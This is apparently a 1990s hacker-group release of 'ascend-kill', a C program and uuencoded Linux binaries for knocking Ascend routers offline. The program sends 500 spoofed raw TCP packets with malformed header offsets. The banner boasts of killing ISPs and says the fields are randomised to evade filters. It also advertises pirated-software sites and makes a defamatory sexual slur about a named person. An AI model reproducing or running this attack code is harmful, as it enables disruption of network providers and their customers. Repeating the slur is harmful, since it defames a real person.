(---------------------- ascend-kill.c  Start -------------------------------)
/*
        The Posse Brings you:

                 The Linux Ascend Kill Program!

              Kill your local ISP (or even non-local)

313373133731337313373133731337313373133731337313373133731337313373133731337
1                                                                         3
3                                                                         1
3 Because Ascend has such a strong programming department that would      3
7 never under any circumstances release a version of their code which     3
3 contained a bug.                                                        7
1                                                                         3
3 Well.  Ascend did it again.  Those pesky non zero length tcp offset's   1
3 do it everytime!  Are those fault lights available in christmas colors  3
7 in time for the season? h0h0h0..                                        3
3                                                                         7
1 BTW, if anyone has any pictures of MSN pops, please post them to        3
3 someplace public so we can all share in the season spirit.              1
3                                                                         3
7 - The Posse is back!                                                    3
3                                                                         7
1 greetz to : alpha bits, the grave digger, and fast freddy.              3
3                                                                         1
3 Goto our eleet ftp sitez:                                               3
7                                                                         3
3                                                                         7
1 The Dark Dungeon    198.34.1xx.xxx 600 gigz online!                     3
3 Strobe Room         34.101.1xx.xxx 1TB of Warez and H/P/V/A/C/K text    1
3                                                                         3
731337313373133731337313373133731337313373133731337313373133731337313373133
3                                                                         7
1     2600.com is run off vnetmax.villagenet.com (205.136.35.3)           3
3   Keep your support of 2600, help Emmanuel play with his little boys    1
3                                                                         3
731337313373133731337313373133731337313373133731337313373133731337313373133                                                                         3

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#include <netdb.h>

unsigned short compute_tcp_checksum(struct tcphdr *th, int len,
          unsigned long saddr, unsigned long daddr)
{
        unsigned long sum;
        __asm__("
            addl %%ecx, %%ebx
            adcl %%edx, %%ebx
            adcl $0, %%ebx
            "
        : "=b"(sum)
        : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
        : "bx", "cx", "dx" );
        __asm__("
            movl %%ecx, %%edx
            cld
            cmpl $32, %%ecx
            jb 2f
            shrl $5, %%ecx
            clc
1:          lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            lodsl
            adcl %%eax, %%ebx
            loop 1b
            adcl $0, %%ebx
            movl %%edx, %%ecx
2:          andl $28, %%ecx
            je 4f
            shrl $2, %%ecx
            clc
3:          lodsl
            adcl %%eax, %%ebx
            loop 3b
            adcl $0, %%ebx
4:          movl $0, %%eax
            testw $2, %%dx
            je 5f
            lodsw
            addl %%eax, %%ebx
            adcl $0, %%ebx
            movw $0, %%ax
5:          test $1, %%edx
            je 6f
            lodsb
            addl %%eax, %%ebx
            adcl $0, %%ebx
6:          movl %%ebx, %%eax
            shrl $16, %%eax
            addw %%ax, %%bx
            adcw $0, %%bx
            "
        : "=b"(sum)
        : "0"(sum), "c"(len), "S"(th)
        : "ax", "bx", "cx", "dx", "si" );
        return((~sum) & 0xffff);
}

#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr)  )
#define tcp_offset  ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;

u_short
ip_checksum (u_short * buf, int nwords)
{
  unsigned long sum;

  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

void
fixhost (struct sockaddr_in *addr, char *hostname)
{
  struct sockaddr_in *address;
  struct hostent *host;

  address = (struct sockaddr_in *) addr;
  (void) bzero ((char *) address, sizeof (struct sockaddr_in));
  address->sin_family = AF_INET;
  address->sin_addr.s_addr = inet_addr (hostname);
  if ((int) address->sin_addr.s_addr == -1)
    {
      host = gethostbyname (hostname);
      if (host)
        {
          bcopy (host->h_addr, (char *) &address->sin_addr,
                 host->h_length);
        }
      else
        {
          puts ("Couldn't resolve address!!!");
          exit (-1);
        }
    }
}

unsigned int
lookup (host)
     char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

unsigned short
lookup_port (p)
     char *p;
{
  int i;
  struct servent *s;

  if ((i = atoi (p)) == 0)
    {
      if ((s = getservbyname (p, "tcp")) == NULL)
        errors ("Unknown port %s\n", p);
      i = ntohs (s->s_port);
    }
  return ((unsigned short) i);
}

void
spoof_packet (struct sockaddr_in local, int fromport, \
           struct sockaddr_in remote, int toport, ulong sequence, \
           int sock, u_char theflag, ulong acknum, \
           char *packdata, int datalen)
{
  char *packet;
  int tempint;
  if (datalen > 0)
    datalen++;
  packet = (char *) malloc (psize + datalen);
  tempint = toport;
  toport = fromport;
  fromport = tempint;
  {
    struct tcphdr *fake_tcp;
    fake_tcp = (struct tcphdr *) (packet + tcp_offset);
    fake_tcp->th_dport = htons (fromport);
    fake_tcp->th_sport = htons (toport);
    fake_tcp->th_flags = theflag;
    fake_tcp->th_seq = random ();
    fake_tcp->th_ack = random ();
    /* this is what really matters, however we randomize everything else
       to prevent simple rule based filters */
    fake_tcp->th_off = random ();
    fake_tcp->th_win = random ();
    fake_tcp->th_urp = random ();
  }
  if (datalen > 0)
    {
      char *tempbuf;
      tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
      for (tempint = 0; tempint < datalen - 1; tempint++)
        {
          *tempbuf = *packdata;
          *tempbuf++;
          *packdata++;
        }
      *tempbuf = '\r';
    }
  {
    struct iphdr *real_ip;
    real_ip = (struct iphdr *) packet;
    real_ip->version = 4;
    real_ip->ihl = 5;
    real_ip->tot_len = htons (psize + datalen);
    real_ip->tos = 0;
    real_ip->ttl = 64;
    real_ip->protocol = 6;
    real_ip->check = 0;
    real_ip->id = 10786;
    real_ip->frag_off = 0;
    bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
    bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
    temp_ip.saddr = htonl (ntohl (real_ip->daddr));
    real_ip->daddr = htonl (ntohl (real_ip->saddr));
    real_ip->saddr = temp_ip.saddr;
    real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
    {
      struct tcphdr *another_tcp;
      another_tcp = (struct tcphdr *) (packet + tcp_offset);
      another_tcp->th_sum = 0;
      another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
                                       real_ip->saddr, real_ip->daddr);
    }
  }
  {
    int result;
    sock = (int) temp_socket;
    result = sendto (sock, packet, psize + datalen, 0,
                     (struct sockaddr *) &remote, sizeof (remote));
  }
  free (packet);
}

void
main (argc, argv)
     int argc;
     char **argv;
{
  unsigned int daddr;
  unsigned short dport;
  struct sockaddr_in sin;
  int s, i;
  struct sockaddr_in local, remote;
  u_long start_seq = 4935835 + getpid ();

  if (argc != 3)
    errors ("Usage: %s <dest_addr> <dest_port>\n\nDest port of 23 for Ascend units.\n",
          argv[0]);

  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(daddr = lookup (argv[1])))
    err ("Unable to lookup destination address.\n");
  dport = lookup_port (argv[2]);
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = daddr;
  sin.sin_port = dport;
  fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]);
  fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]);
  /* 500 seems to be enough to kill it */
  for (i = 0; i < 500; i++)
    {
      start_seq++;
      local.sin_addr.s_addr = random ();
      spoof_packet (local, random (), remote, dport, start_seq, (int) s,
        TH_SYN | TH_RST | TH_ACK, 0, NULL, 0);
    }
}

(---------------------- ascend-kill.c  End -------------------------------)

(------------------ ascend-kill bin for ELF Start ------------------------)
begin 755 ascend-kill.elf
M?T5,1@$!`0````````````(``P`!````H`8`"#0```"D$0```````#0`(``%
M`"@`%``3``8````T````-```"#0```B@````H`````4````$`````P```-0`
M``#4```(U```"!,````3````!`````$````!``````````````@````(T@\`
M`-(/```'`````!````$```#8#P``V!\`"-@?``CT````9`$```8`````$```
M`@```$00``!$(``(1"``"(@```"(````!@````0````O;&EB+VQD+6QI;G5X
M+G-O+C$``!$````?````$@```!P````7``````````\````1````$P``````
M```4````"P```!4````9````&@```!@````.````%@``````````````````
M```````;```````````````#````````````````````!```````````````
M"@````4````&````````````````````#0````D````'``````````@````>
M````'0`````````!````$`````(````,``````````````````````````L`
M``!$(``(`````!$`\?\4````>`4`"*H````2````'0```(@%``AL!```$@``
M`"\```"8!0`(`````"(````V````T"``"%0````1`!$`0@```*@%``@`````
M(@```$<```"X!0`(`````"(```!.````R`4`"%@````B````50```-@?``@$
M````$0`,`%\```#8!0`(-@```!(```!E````8`4`"``````2``<`:P```.@%
M``A&````$@```'<```#8'P`(!````"``#`!_````^`4`"``````B````AP``
M``@&``@Y````$@```)$````D(0`(`@```!$`$0"?````&`8`"'8````B````
MI@```"@&``B2````$@```*P````X!@`()`$``!(```"Z````$`\`"``````2
M``H`P````$@&``A1`0``$@```,X```!8!@`(-````!(```#5````\!\`"```
M```1`/'_ZP```&@&``B`````$@```/````!X!@`(/@```!(```#[````B`8`
M"``````B``````$```0/``@`````$0#Q_P<!``#,(``(`````!$`\?\.`0``
MS"``"``````1`/'_&@$``#PA``@`````$0#Q_P!L:6)C+G-O+C4`7T193D%-
M24,`7U]R86YD;VT`7U]S=')T;VQ?:6YT97)N86P`9V5T<&ED`%])3U]S=&1E
M<G)?`'!U=',`;6%L;&]C`'-O8VME=`!?7V5N=FER;VX`8GIE<F\`7VEN:70`
M7U]L:6)C7VEN:70`96YV:7)O;@!F<')I;G1F`&EN971?861D<@!?7V9P=5]C
M;VYT<F]L`'-E;F1T;P!B8V]P>0!G971H;W-T8GEN86UE`%]F:6YI`&=E='-E
M<G9B>6YA;64`871E>&ET`%]'3$]"04Q?3T9&4T547U1!0DQ%7P!E>&ET`%]?
M<V5T9G!U8W<`9G)E90!?971E>'0`7V5D871A`%]?8G-S7W-T87)T`%]E;F0`
M`-`@``@%!0``)"$`"`40``#\'P`(!P(````@``@'`P``!"``"`<$```((``(
M!P8```P@``@'!P``$"``"`<(```4(``(!PH``!@@``@'#```'"``"`<.```@
M(``(!P\``"0@``@'$0``*"``"`<2```L(``(!Q,``#`@``@'%0``-"``"`<6
M```X(``(!Q@``#P@``@'&0``0"``"`<:``#H>PD``,(``/\U]!\`"/\E^!\`
M"`````#_)?P?``AH`````.G@_____R4`(``(:`@```#IT/____\E!"``"&@0
M````Z<#_____)0@@``AH&````.FP_____R4,(``(:"````#IH/____\E$"``
M"&@H````Z9#_____)10@``AH,````.F`_____R48(``(:#@```#I</____\E
M'"``"&A`````Z6#_____)2`@``AH2````.E0_____R4D(``(:%````#I0/__
M__\E*"``"&A8````Z3#_____)2P@``AH8````.D@_____R4P(``(:&@```#I
M$/____\E-"``"&AP````Z0#_____)3@@``AH>````.GP_O___R4\(``(:(``
M``#IX/[___\E0"``"&B(````Z=#^__\``````````%F)XXG@B<H!T@'2`="#
MP`0Q[55558GE4%-1N(@```"[`````,V`BT0D"*/8'P`(#[<%)"$`"%#HG/__
M_X/$!.@$____:!`/``CH:O___X/$!.AJ_O__Z!4%``!0Z&?___];C;0F````
M`(VT)@````"X`0```,V`Z_>-M"8`````4[OL'P`(@SWL'P`(`'0-D(L#_]"#
MPP2#.P!U]%O#C3;#D)"0D)"0D)"0D)"0D)"058GE5U939HM%#(;$P>`0!0`&
M``"+712+31")P@'+$=.#TP"+30R+=0B)ROR#^2!R(\'I!?BM$<.M$<.M$<.M
M$<.M$<.M$<.M$<.M$</BYH/3`(G1@^$<=`S!Z0+XK1'#XON#TP"X`````&;W
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
M\P$``'ZJC66X6UY?B>Q=PY"0D)"0D)"0D)"0D%.[X!\`"(,]X!\`"/]T#9"+
M`__0@\/\@SO_=?1;PXTVPY"0D````````````````.@+^/__P@``0V]U;&1N
M)W0@<F5S;VQV92!A9&1R97-S(2$A`'1C<`!5;FMN;W=N('!O<G0@)7,*`%5S
M86=E.B`E<R`\9&5S=%]A9&1R/B`\9&5S=%]P;W)T/@H*1&5S="!P;W)T(&]F
M(#(S(&9O<B!!<V-E;F0@=6YI=',N"@!5;F%B;&4@=&\@;W!E;B!R87<@<V]C
M:V5T+@H`56YA8FQE('1O(&QO;VMU<"!D97-T:6YA=&EO;B!A9&1R97-S+@H`
M``````````````````#_____`````/____\`````1"``"```````````?@4`
M"(X%``B>!0`(K@4`"+X%``C.!0`(W@4`".X%``C^!0`(#@8`"!X&``@N!@`(
M/@8`"$X&``A>!@`(;@8`"'X&``B.!@`(`0````$````,````8`4`"`T````0
M#P`(!````.@```@%````H`,`"`8```"P`0`("@```!\!```+````$````!4`
M`````````P```/`?``@"````D````!0````1````%P```-`$``@1````P`0`
M"!(````0````$P````@```````````````!'0T,Z("A'3E4I(#(N-RXR+FPN
M,P``1T-#.B`H1TY5*2`R+C<N,@``1T-#.B`H1TY5*2`R+C<N,BYL+C,``"YS
M>6UT86(`+G-T<G1A8@`N<VAS=')T86(`+FEN=&5R<``N:&%S:``N9'EN<WEM
M`"YD>6YS='(`+G)E;"YB<W,`+G)E;"YP;'0`+FEN:70`+G!L=``N=&5X=``N
M9FEN:0`N<F]D871A`"YD871A`"YC=&]R<P`N9'1O<G,`+F=O=``N9'EN86UI
M8P`N8G-S`"YC;VUM96YT````````````````````````````````````````
M```````````````;`````0````(```#4```(U````!,```````````````$`
M````````(P````4````"````Z```".@```#(`````P`````````$````!```
M`"D````+`````@```+`!``BP`0``\`$```0````!````!````!`````Q````
M`P````(```"@`P`(H`,``!\!``````````````$`````````.0````D````"
M````P`0`",`$```0`````P```!$````$````"````$(````)`````@```-`$
M``C0!```D`````,````(````!`````@```!+`````0````8```!@!0`(8`4`
M``@``````````````!``````````40````$````'````:`4`"&@%```P`0``
M```````````$````!````%8````!````!@```*`&``B@!@``9`@`````````
M````$`````````!<`````0````8````0#P`($`\```@``````````````!``
M````````8@````$````"````&`\`"!@/``"Z```````````````!````````
M`&H````!`````P```-@?``C8#P``"```````````````!`````````!P````
M`0````,```#@'P`(X`\```@```````````````0`````````=P````$````#
M````Z!\`".@/```(```````````````$`````````'X````!`````P```/`?
M``CP#P``5```````````````!`````0```"#````!@````,```!$(``(1!``
M`(@````$``````````0````(````C`````@````#````S"``",P0``!P````
M```````````(`````````)$````!``````````````#,$```/@``````````
M`````0`````````1`````P``````````````"A$``)H```````````````$`
&````````
`
end

(------------------ ascend-kill bin for ELF End ------------------------)

(----------------- ascend-kill bin for aout Start ----------------------)

begin 755 ascend-kill.aout
MS`!D```0````$``````````````@$`````````````#H<PH``+@M````NP``
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
M;RXT`$1,3"!*=6UP(#0N-W!L-0"0D```````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`-,>Z_X`````#"``````````````````````D)``````2!P``%(<``````!@
MP0($``#P"&`````````````````!````^#\`8``````#`````"```#@@```P
M(`````````(```#\'P``("``````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
